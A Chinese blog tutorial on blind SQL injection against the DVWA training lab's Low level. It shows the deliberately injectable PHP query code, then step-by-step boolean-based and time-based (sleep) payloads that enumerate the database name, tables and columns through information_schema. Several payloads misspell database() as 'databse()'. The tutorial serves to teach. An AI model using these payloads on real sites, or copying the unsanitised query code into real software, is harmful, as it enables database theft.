SQL Injection Blind(Low)

最新推荐文章于 2022-07-28 19:23:28 发布

小蘑菇~~~

最新推荐文章于 2022-07-28 19:23:28 发布

阅读量228

点赞数

分类专栏：安全

本文链接：https://blog.csdn.net/wst0717/article/details/102663428

版权

安全专栏收录该内容

35 篇文章 1 订阅

订阅专栏

文章目录

- Low

Low

代码分析:

<?php 

if( isset( $_GET[ 'Submit' ] ) ) { 
    // Get input 
    $id = $_GET[ 'id' ]; 

    // Check database 
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; 
    $result = mysql_query( $getid ); // Removed 'or die' to suppress mysql errors 

    // Get results 
    $num = @mysql_numrows( $result ); // The '@' character suppresses errors 
    if( $num > 0 ) { 
        // Feedback for end user 
        echo '<pre>User ID exists in the database.</pre>'; 
    } 
    else { 
        // User wasn't found, so the page wasn't! 
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' ); 

        // Feedback for end user 
        echo '<pre>User ID is MISSING from the database.</pre>'; 
    } 

    mysql_close(); 
} 

?>

这里是SQL盲注漏洞
在这里插入图片描述

漏洞利用

基于布尔的盲注：

1)判断是否存在注入，注入是字符型还是数字型

如何判断是字符型注入还是数字型注入
输入
1 and 1=1
1and 1=2，
页面回显相同，显示相应用户存在：
在这里插入图片描述
输入
1’ and ‘1’='1 ，显示相应用户存在：
1’and ‘1’='2，显示相应用户不存在：
页面回显不一致

得出结论：字符串注入

2)猜解数据库名

想要猜解数据库名，首先要猜解数据库名的长度，然后挨个猜解字符。

输入1’ and length(database())=1 #，显示不存在；
输入1’ andlength(database())=2 #，显示不存在；
输入1’ and length(database())=3 #，显示不存在；
输入1’ and length(database())=4 #，显示存在：

说明数据库名长度为4。

下面采用二分法猜解数据库名。

输入1’ and ascii(substr(databse(),1,1))>97
显示存在，说明数据库名的第一个字符的ascii值大于97（小写字母a的ascii值）；

输入1’ and ascii(substr(databse(),1,1))<122
显示存在，说明数据库名的第一个字符的ascii值小于122（小写字母z的ascii值）；

输入1’ and ascii(substr(databse(),1,1))<109
显示存在，说明数据库名的第一个字符的ascii值小于109（小写字母m的ascii值）；

输入1’ and ascii(substr(databse(),1,1))<103

显示存在，说明数据库名的第一个字符的ascii值小于103（小写字母g的ascii值）；

输入1’ and ascii(substr(databse(),1,1))<100
显示不存在，说明数据库名的第一个字符的ascii值不小于100（小写字母d的ascii值）；
输入1’ and ascii(substr(databse(),1,1))>100
显示不存在，说明数据库名的第一个字符的ascii值不大于100（小写字母d的ascii值），所以数据库名的第一个字符的ascii值为100，即小写字母d。

**
…
**
重复上述步骤，就可以猜解出完整的数据库名（dvwa）了。

3)猜解数据库中的表名

首先猜解数据库中表的数量：

1’ and (select count (table_name) from information_schema.tables where
table_schema=database())=1 # 显示不存在

1’ and (select count (table_name) from information_schema.tables where
table_schema=database() )=2 # 显示存在

说明数据库中共有两个表。

接着挨个猜解表名：

1’ and length(substr((select table_name from information_schema.tables where table_schema=database() limit
0,1),1))=1 # 显示不存在 1’ and length(substr((select table_name from
information_schema.tables where table_schema=database() limit
0,1),1))=2 # 显示不存在

… 1’ and length(substr((select table_name from
information_schema.tables where table_schema=database() limit
0,1),1))=9 # 显示存在

说明第一个表名长度为9。

1’ and ascii(substr((select table_name from information_schema.tables
where table_schema=database() limit 0,1),1,1))>97 # 显示存在

1’ and ascii(substr((select table_name from information_schema.tables
where table_schema=database() limit 0,1),1,1))<122 # 显示存在

1’ and ascii(substr((select table_name from information_schema.tables
where table_schema=database() limit 0,1),1,1))<109 # 显示存在

1’ and ascii(substr((select table_name from information_schema.tables
where table_schema=database() limit 0,1),1,1))<103 # 显示不存在

1’ and ascii(substr((select table_name from information_schema.tables
where table_schema=database() limit 0,1),1,1))>103 # 显示不存在

说明第一个表的名字的第一个字符为小写字母g。

…

重复上述步骤，即可猜解出两个表名（guestbook、users）。

4)猜解表中的字段名

首先猜解表中字段的数量：

1’ and (select count(column_name) from information_schema.columns
where table_name= ’users’)=1 # 显示不存在

…

1’ and (select count(column_name) from information_schema.columns
where table_name= ’users’)=8 # 显示存在

说明users表有8个字段。

接着挨个猜解字段名：

1’ and length(substr((select column_name from
information_schema.columns where table_name= ’users’ limit 0,1),1))=1
显示不存在

…

1’ and length(substr((select column_name from
information_schema.columns where table_name= ’users’ limit 0,1),1))=7
显示存在

说明users表的第一个字段为7个字符长度。

采用二分法，即可猜解出所有字段名。

5)猜解数据

同样采用二分法。

基于时间的盲注

1)判断是否存在注入，注入是字符型还是数字型

输入1’ and sleep(5) #，感觉到明显延迟；

输入1 and sleep(5) #，没有延迟；

说明存在字符型的基于时间的盲注。

2).猜解当前数据库名

首先猜解数据名的长度：

1’ and if(length(database())=1,sleep(5),1) # 没有延迟

1’ and if(length(database())=2,sleep(5),1) # 没有延迟

1’ and if(length(database())=3,sleep(5),1) # 没有延迟

1’ and if(length(database())=4,sleep(5),1) # 明显延迟

说明数据库名长度为4个字符。

接着采用二分法猜解数据库名：

1’ and if(ascii(substr(database(),1,1))>97,sleep(5),1)# 明显延迟

…

1’ and if(ascii(substr(database(),1,1))<100,sleep(5),1)# 没有延迟

1’ and if(ascii(substr(database(),1,1))>100,sleep(5),1)# 没有延迟

说明数据库名的第一个字符为小写字母d。

…

重复上述步骤，即可猜解出数据库名。

3)猜解数据库中的表名

首先猜解数据库中表的数量：

1’ and if((select count(table_name) from information_schema.tables
where table_schema=database() )=1,sleep(5),1)# 没有延迟

1’ and if((select count(table_name) from information_schema.tables
where table_schema=database() )=2,sleep(5),1)# 明显延迟

说明数据库中有两个表。

接着挨个猜解表名：

1’ and if(length(substr((select table_name from
information_schema.tables where table_schema=database() limit
0,1),1))=1,sleep(5),1) # 没有延迟

…

1’ and if(length(substr((select table_name from
information_schema.tables where table_schema=database() limit
0,1),1))=9,sleep(5),1) # 明显延迟

说明第一个表名的长度为9个字符。

采用二分法即可猜解出表名。

4)猜解表中的字段名

首先猜解表中字段的数量：

1’ and if((select count(column_name) from information_schema.columns
where table_name= ’users’)=1,sleep(5),1)# 没有延迟

…

1’ and if((select count(column_name) from information_schema.columns
where table_name= ’users’)=8,sleep(5),1)# 明显延迟

说明users表中有8个字段。

接着挨个猜解字段名：

1’ and if(length(substr((select column_name from
information_schema.columns where table_name= ’users’ limit
0,1),1))=1,sleep(5),1) # 没有延迟

…

1’ and if(length(substr((select column_name from
information_schema.columns where table_name= ’users’ limit
0,1),1))=7,sleep(5),1) # 明显延迟

说明users表的第一个字段长度为7个字符。

采用二分法即可猜解出各个字段名。